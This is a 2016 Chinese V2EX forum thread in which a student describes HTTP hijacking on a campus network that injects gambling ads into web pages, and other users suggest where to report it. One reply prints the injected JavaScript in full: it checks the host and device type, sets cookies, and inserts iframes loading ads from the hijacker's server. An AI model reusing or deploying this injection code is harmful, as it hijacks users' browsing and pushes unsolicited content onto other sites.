V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
langjiyuan
V2EX  ›  问与答

教育网 河北电信出口 http 劫持,互相扯皮,求助。。

  •  
  •   langjiyuan · 2016-05-13 10:05:37 +08:00 · 5088 次点击
    这是一个创建于 3152 天前的主题,其中的信息可能已经有所发展或是发生改变。
    宽带情况:大学内教育网,日常出口为河北电信。

    运营商:学校内 互联网中心下属 易佳网络。不属于电信分公司。

    http 劫持:访问 http 时几乎每个网页都有 http://121.201.58.227:8000 插入的一段。改 DNS 无效,为 http 劫持。访问 www.bilibili.com/时候右下角 就弹出广告。 bilibili 错误响应地址 113.105.152.207 广东东莞电信 正常时响应 应为 219.149.55.232 辽宁沈阳电信。广 告 http://121.201.58.227:8000/Upload/2016-05-12/573436934f6c6.gif

    现状:拦截了这个广告 bilibili 一半的内容就加载不出来。

    投诉:投诉电信,并非电信宽带用户,扯皮。投诉到学校互联网中心他们只管网能上就行。电信在校园网出口劫持他们管不了。投诉工信部找电信也不是,找校园网也不是。。。互相扯皮 ,,,我该怎么办呢? b 站也挂代理?,,,求助万能的 v 友,曾经遇到过 http 劫持的,你们是怎样让运营商屈服的?求助,
    23 条回复    2016-05-14 12:45:15 +08:00
    turan12
        1
    turan12  
       2016-05-13 10:50:53 +08:00   ❤️ 1
    向工信部投诉不知道有没有效果?
    yexm0
        2
    yexm0  
       2016-05-13 10:54:49 +08:00 via Android   ❤️ 1
    没有效果,在工信部上投诉这些二道贩子多数情况下没什么用。
    langjiyuan
        3
    langjiyuan  
    OP
       2016-05-13 10:57:02 +08:00
    @yexm0 ai ,刚才又是一通的扯皮。 教育网宽带就是比普通宽带用户麻烦的多。各种加强版的 g 。 w 。 f 。
    langjiyuan
        4
    langjiyuan  
    OP
       2016-05-13 10:58:54 +08:00
    @turan12 没用了 ,工信部扔到了电信就没了,因为不是独立的电信宽带用户,电信没法单独停止劫持,要不然只能停止对学校整个电信出口的劫持。。想想也不可能啊,。。就因为一个用户的投诉。。。
    alonga
        5
    alonga  
       2016-05-13 11:28:22 +08:00   ❤️ 1
    @langjiyuan

    赌博广告都敢搞,这些人胆子肥啊。
    他的代码是?插入方式?

    你首先确定是哪个部分的问题,然后顺藤摸瓜。

    如果你取证最好弄个 Linux live 。


    http://www.12377.cn/
    违法和不良信息举报中心

    http://www.12321.cn/
    12321 网络不良与垃圾信息举报受理中心

    http://www.cyberpolice.cn/
    网络违法犯罪举报网站

    http://hbjubao.hebei.com.cn/
    河北互联网违法和不良信息举报中心
    alonga
        6
    alonga  
       2016-05-13 11:38:27 +08:00
    这个易佳网络是?类似赛尔网络?这种二手宽带运营商最喜欢劫持。
    langjiyuan
        7
    langjiyuan  
    OP
       2016-05-13 11:38:45 +08:00
    @alonga 唉,学嵌入式的,,对网页注入 这部分还真不熟悉。。
    langjiyuan
        8
    langjiyuan  
    OP
       2016-05-13 11:40:38 +08:00
    @alonga 这是那段代码 我只能看懂 有 浏览器标识的识别 和几个不劫持的网站。。
    var scr = document.getElementsByTagName('SCRIPT');
    var url = scr[scr.length - 1].src + "?t=283718787";
    document.write('<script src="' + url + '"></script>');
    var host = window.location.host;
    var n = Math.round(Math.random() * 100);
    var arr = ['www.baidu.com', 'www.w0517.com', 'www.qq.com', 'www.360.cn', 'baidu.com', '360.cn', 'w0517.com', 'qq.com', 'sina.com', 'localhost'];

    function contains(arr, obj) {
    var i = arr.length;
    while (i--) {
    if (arr[i] === obj) {
    return true
    }
    }
    return false
    }
    var sta = contains(arr, host);

    function check_mobile() {
    var ua = navigator.userAgent;
    ua = ua ? ua.toLowerCase().replace(/-/g, "") : "";
    if (ua.match(/(Android|iPhone|iPod|iPad)/i)) {
    return true
    } else {
    return false
    }
    }
    var isM = check_mobile();

    function closeFootAd() {
    document.getElementById('_ad_top_1').style.display = 'none';
    setCookie(host, 0)
    }

    function setCookie(name, value) {
    var exp = new Date();
    host = window.location.host;
    exp.setTime(exp.getTime() + 24 * 60 * 60 * 1000);
    document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString()
    }

    function getCookie(name) {
    var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
    if (arr != null) return unescape(arr[2]);
    return null
    }
    function i(w,h,t,b,l,r,s){
    var d = document.createElement('div');
    var dd = document.createElement('img');
    var i = document.createElement('iframe');
    dd.setAttribute('src', 'http://121.201.58.227:8000/close-icon.png');
    dd.style.position = 'absolute';
    dd.style.top = '0px';
    dd.style.right = '0px';
    dd.style.width = "30px";
    dd.style.zIndex = '9999999999999';
    dd.onclick = function () {
    closeFootAd()
    }

    d.style.position = 'fixed';
    if(w){
    d.style.width = w;
    }
    if(h){
    d.style.height = h;
    }

    if(t){
    d.style.top = t;
    }
    if(b){
    d.style.bottom = b;
    }
    if(l){
    d.style.left = l;
    }
    if(r){
    d.style.right = r;
    }

    d.style.zIndex = "9999999999998";
    d.setAttribute('id', '_ad_top_1');
    i.setAttribute('src', s);
    i.setAttribute('scrolling','no');
    i.style.overflow = 'hidden';

    if(w){
    i.style.width = w;
    }
    if(h){
    i.style.height = h;
    }

    i.setAttribute('frameBorder', '0');
    d.appendChild(i);
    d.appendChild(dd);
    var has = document.getElementById('_ad_top_1');
    if(document.body){
    if(!has){
    document.body.appendChild(d);
    }

    }else{
    window.onload = function(){
    if(!has){
    document.body.appendChild(d);
    }
    }
    }

    }

    if (getCookie(host) == 0 || sta) {} else if (isM) {

    var w = "300px";
    var h = "150px";
    var t = "false";
    var b = "0px";
    var l = "0px";
    var r = "false";
    i(w,h,t,b,l,r,'http://121.201.58.227:8000/tp/wap.php?id=6&ad=1');

    } else {

    var w = "300px";
    var h = "250px";
    var t = "false";
    var b = "10px";
    var l = "false";
    var r = "10px";
    i(w,h,t,b,l,r,'http://121.201.58.227:8000/pc.php?id=6&ad=1')


    }
    langjiyuan
        9
    langjiyuan  
    OP
       2016-05-13 11:42:02 +08:00
    @alonga 应该是个二级网络运营商 跟学校校园网管理中心 绑定的,学校附属居民区这边都是他们的地盘。
    alonga
        10
    alonga  
       2016-05-13 11:47:10 +08:00
    @langjiyuan 好吧,简单的方法把那个赌博的广告图片地址发给这些举报中心。
    广告显示形式你截图下,发给他们就行了。

    还可以举报到这个睿江科技 http://www.efly.cc/ (广告图片的机房),说他们机房有人放赌博广告,他们处理应该很快。
    但这是对他们客气了,很多黄赌毒都是放这个睿江科技的,这公司不干净,不如举报到那些举报中心。
    alonga
        11
    alonga  
       2016-05-13 11:50:59 +08:00
    @langjiyuan 有插入到网页的代码不?这个是他广告显示的代码,作用不大。
    他是插入一段代码,还是替换代码。
    langjiyuan
        12
    langjiyuan  
    OP
       2016-05-13 12:04:28 +08:00
    @alonga 对网页端 不熟悉,看不出来,不过直接在互联网管理中心举报了。剩下的不管了。 挂代理访问。 谢谢指导。对无良运营商,,无语。
    alonga
        13
    alonga  
       2016-05-13 12:14:17 +08:00
    @langjiyuan 还可以举报到本地教育局。
    举报的时候,把下面这个新闻带上。
    就说有人劫持校园网络,违法投放赌博广告,引诱学生赌博,可能危害到本地学校安全。


    http://sports.163.com/16/0319/13/BIHA10QT00051C89.html
    大学生网贷赌球欠债 60 万跳楼身亡 劝父母别收尸
    ayaseangle
        14
    ayaseangle  
       2016-05-13 16:23:03 +08:00 via Android
    胆肥。。
    langjiyuan
        15
    langjiyuan  
    OP
       2016-05-13 16:40:05 +08:00
    7timesonenight
        16
    7timesonenight  
       2016-05-13 19:53:12 +08:00
    除了工信部等投诉网络运营商之外,还可以仔细观察劫持后弹出的广告,
    1 、看是哪个广告联盟的,向主管的部门,比如互联网举报中心、工商总局,广告联盟被搞,必然会查问题流量源,然后 ban 掉它;
    2 、看该广告具体是哪个公司的,
    2-1 、如果是正规的公司,就像广告联盟投诉,说该广告流氓投放,威胁联盟,告诉联盟如果不管的话就向主管衙门投诉;
    2-2 、如果是违法、擦边球广告,不用客气了。

    一旦被搞过,这些广告主和广告联盟,以后就会对流量源合法性上心的。
    lotuslotus
        17
    lotuslotus  
       2016-05-13 23:45:04 +08:00
    @7timesonenight 然而还是会被插广告
    ayaseangle
        18
    ayaseangle  
       2016-05-14 05:11:07 +08:00
    @langjiyuan 赌博广告都敢挂。。
    langjiyuan
        19
    langjiyuan  
    OP
       2016-05-14 10:28:02 +08:00
    @ayaseangle 谁知道 这些怎么搞的,或许是层层外包 临时工干的 //手动滑稽。。
    ayaseangle
        20
    ayaseangle  
       2016-05-14 10:29:07 +08:00
    @langjiyuan 只能尽量走 https 流量了。。。
    langjiyuan
        21
    langjiyuan  
    OP
       2016-05-14 10:29:26 +08:00
    @7timesonenight 已经举报了,下一步不管了,全局代理 去他的劫持吧。跟运营商扯皮 太累了,没工夫。
    langjiyuan
        22
    langjiyuan  
    OP
       2016-05-14 11:44:57 +08:00
    @ayaseangle b 站 没。。 https 。。。
    ayaseangle
        23
    ayaseangle  
       2016-05-14 12:45:15 +08:00
    @langjiyuan 国内站点的悲哀。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2644 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 06:34 · PVG 14:34 · LAX 22:34 · JFK 01:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.